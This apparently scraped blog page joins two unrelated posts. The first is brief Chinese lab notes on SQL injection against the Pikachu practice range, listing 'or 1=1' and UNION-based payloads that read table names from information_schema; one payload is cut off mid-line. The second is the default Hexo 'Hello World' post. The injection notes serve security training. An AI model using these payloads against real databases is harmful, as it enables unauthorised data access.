pikachu sql注入
数字型测试:
$id=$_POST[‘id’]
select 字段1,字段2 from 表名 where id = 1 or 1=1;
字符型测试:
$uname=$_GET[‘username’]
select 字段1,字段2 from 表名 where username=’kobe’ or 1=1#’;
搜索型测试:
like ‘%%’
xxxx%’ or 1=1 #
xx型测试:
=(’’)
xx’) or 1=1 #
#获取表名:
select id,email from member where username = ‘kobe’ union select table_schema,table_name from information_schema.tables where table_schema=’pikachu’;
test payload:
kobe’ union select table_schema,table_name from information ...
Hello World
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
Quick StartCreate a new post1$ hexo new "My New Post"
More info: Writing
Run server1$ hexo server
More info: Server
Generate static files1$ hexo generate
More info: Generating
Deploy to remote sites1$ hexo deploy
More info: Deployment